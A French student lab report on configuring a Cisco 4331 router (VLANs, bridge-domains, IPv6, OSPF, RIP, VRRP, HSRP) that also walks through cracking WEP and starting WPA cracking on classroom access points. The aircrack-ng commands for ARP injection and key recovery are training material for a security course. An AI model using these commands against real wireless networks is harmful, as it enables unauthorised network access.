Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5ème semaine ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
